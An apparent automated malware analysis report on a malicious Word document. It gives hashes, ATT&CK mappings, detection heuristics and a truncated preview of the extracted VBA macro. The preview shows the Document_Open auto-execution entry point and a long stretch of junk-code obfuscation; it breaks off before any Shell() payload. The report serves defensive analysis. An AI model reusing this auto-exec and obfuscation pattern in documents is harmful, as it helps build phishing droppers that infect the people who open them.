Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c3e462113992570…

MALICIOUS

Office (OLE)

Size: 233.5 KB
Created: 2018-09-27 19:10:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 0abab5967d5a5a4ff831912d42afda8e
SHA-1: 3b9c883257d1783769a9fe0042554edb30cac46e
SHA-256: 7c3e462113992570ab81bf4298b16b02fed9451218dd5ea4da48bde2e25a2453
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The Document_Open macro is configured to execute a Shell() command, indicating it's designed to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Content', a common social engineering tactic to bypass macro security. The ClamAV detection name 'Doc.Trojan.tRat-6760546-1' further supports its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Trojan.tRat-6760546-1 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.tRat-6760546-1
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA source contains a Shell() call
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    The document defines a Document_Open auto-execution macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure (medium) SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below are XML namespace identifiers (RDF, XMP, Dublin Core, DrawingML) of the kind carried in embedded image metadata, and each was found in the document body rather than in the macro.
    • http://www.day.com/dam/1.0 (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 67015 bytes
SHA-256: d67d82dcb7ba8d5d2439a1628d1eab0ea3286f82bcba3df809b7cb2914625c5f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "IcT3wRl"
Sub Hitler(BktQLcoOR)
If 353 - 85 = 2851 - 2840 Then
O1Vr9Adk = "YwQ3u2"
End If
mKYMrnX4 = 31274
fjOPHmAIg = O1Vr9Adk & mKYMrnX4
If 22 < 214 Then
' r1czxHEd
Else
' GNL0k3
Debug.Print "CXoGijN"
End If
If 33 < 144 Then
' XI8BlL
Else
' QQdvt
Debug.Print "tcEzSKHI"
End If
If 387 + 36 = 24817 - 24816 Then
GvpRc4uiy = "KgptN"
End If
rsnXWNK = "xmBwY1xO"
BP89lN = GvpRc4uiy & rsnXWNK
If 33 < 144 Then
' GluZQjb
Else
' jZUvo
MsgBox "PuTqA"
End If
If 387 + 36 = 24817 - 24816 Then
GMYhy4kI = "obsAZH"
End If
nMftBK6Ww = "uiDtFCs7N"
rWwEL = GMYhy4kI & nMftBK6Ww
If 397 * 2 = 1948 - 1937 Then
Zb2O1k = "wswE71"
End If
TpTHwrj = "Xt6IXVHy"
XdNivab = Zb2O1k & TpTHwrj
If 14 < 192 Then
' JgUos
Else
' aSBDE
Debug.Print "o4jRc2Yx"
End If
Dim V8GNVJb7
V8GNVJb7 = 131
While V8GNVJb7 < 351
V8GNVJb7 = V8GNVJb7 + 1
Wend
rWx2EiUrO = 19607
kDVZRkc = adVuZ & V8GNVJb7
If 14 < 192 Then
' eLjGUu
Else
' f7NP8G
MsgBox "hgY0w"
End If
If 368 - 120 = 366 - 353 Then
v2XYq = "C3fSHcjC"
End If
Eco8hD = 10665
bVRqmk9g = v2XYq & Eco8hD
If 12 < 238 Then
' U3R460B
Else
' a37o5O
MsgBox "EIF8i"
End If
If 12 < 238 Then
' wAJCyaPO
Else
' SPrBQD
Debug.Print "b0VoCXNx"
End If
If 309 + 62 = 2586 - 2575 Then
wl7LDy8x = "PY9kntcPL"
End If
gYun0QDK = 5982
UyBGE97V = wl7LDy8x & gYun0QDK
If 15 < 230 Then
' leisZ8p
Else
' PDwkjGSF
Debug.Print "FOjTt2iW"
End If
If 309 + 62 = 2586 - 2575 Then
NgUn29K8k = "DFjB6"
End If
NrHo9Ctc7 = "UioMBu8T"
sr20gwITA = NgUn29K8k & NrHo9Ctc7
If 15 < 230 Then
' fv59JEY
Else
' cLegw3W
Debug.Print "R459ct"
End If
If 28 < 143 Then
' P6BG1H
Else
' tJ8vEwB
Debug.Print "MfjRPUE9r"
End If
If 24477 / 41 = 659 - 644 Then
vadI7ko = "NVHyG"
End If
Ck6W82ItC = 49818
WF5dCQ4G = vadI7ko & Ck6W82ItC
Dim KkFmWyK
KkFmWyK = 225
While KkFmWyK <= 550
KkFmWyK = KkFmWyK + 11
Wend
ZwKRa = "dMlSd6"
wK7OiDZ = ongtCLxhy & KkFmWyK
If 305 - 155 = -3533 + 3542 Then
FEicHBZsw = "PwCezFomZ"
End If
XVh7rw = "uz9ajTg"
dRoXQb = FEicHBZsw & XVh7rw
Dim Y74WM5Nm3
Y74WM5Nm3 = 255
While Y74WM5Nm3 <= 513
Y74WM5Nm3 = Y74WM5Nm3 + 63
Wend
rj9BmD = "UBF9ys"
IWncv = bpPxYQG & Y74WM5Nm3
If 24 < 137 Then
' vO1m9PI0h
Else
' wAwSs95
MsgBox "PNUVg0m"
End If
If 43 < 213 Then
' MYnRGL
Else
' pLz3KW
Debug.Print "RuTvjVP"
End If
Dim hzYioVrWj
hzYioVrWj = 138
While hzYioVrWj < 496
hzYioVrWj = hzYioVrWj + 26
Wend
GJS7qsb = 59014
OqAm9s = z0HLmPF92 & hzYioVrWj
If 407 - 30 = -580 + 595 Then
dQ4b3xDAZ = "Z7MusT"
End If
WH3YJzt = 65095
z129D = dQ4b3xDAZ & WH3YJzt
Dim arK9HZw6
arK9HZw6 = 145
While arK9HZw6 <= 731
arK9HZw6 = arK9HZw6 + 15
Wend
XULrBnCX = "vBz8W34LN"
XBLMT8H = V9iDkdE & arK9HZw6
Dim utS9x
utS9x = 145
While utS9x < 731
utS9x = utS9x + 15
Wend
rs03wd = 65095
sNLlSPK = gyCzSgrF & utS9x
Dim XPJRuNL
XPJRuNL = 59
While XPJRuNL <= 535
XPJRuNL = XPJRuNL + 34
Wend
iGSn0ba = 33375
Vz9t5 = xLQrsN & XPJRuNL
If 12 < 179 Then
' LAFJT
Else
' v3nyu
Debug.Print "U0QCPg"
End If
If 43 < 154 Then
' w4nBMbrLu
Else
' tsOJ2aERY
Debug.Print "e1yCZqf"
End If
Dim UM4OaI6l5
UM4OaI6l5 = 48
While UM4OaI6l5 < 524
UM4OaI6l5 = UM4OaI6l5 + 2
Wend
eSlLyiz6x = "aSIBsoHuy"
XIkxm = JSyqrbI & UM4OaI6l5
If 962 - 7 = 2999 - 2997 Then
xdyTvGE = "HYR7Z0H"
End If
qD0CUF2 = 5929
ljHCLTe = xdyTvGE & qD0CUF2
If 16 < 250 Then
' jra31L
Else
' PsrCLdoS
Debug.Print "HU3V142J"
End If
If 16 < 250 Then
' nkOQDys8
Else
' e5Zs8atG
MsgBox "MsfPWzX"
End If
If 877 - 30 = -1765 + 1780 Then
D2DdT = "I7bWd5G"
End If
fNYZfsKA = 33909
wUjPx = D2DdT & fNYZfsKA
Dim BBalRrW0X
BBalRrW0X = 141
While BBalRrW0X < 346
BBalRrW0X = BBalRrW0X + 11
Wend
jHCIqR
... (truncated)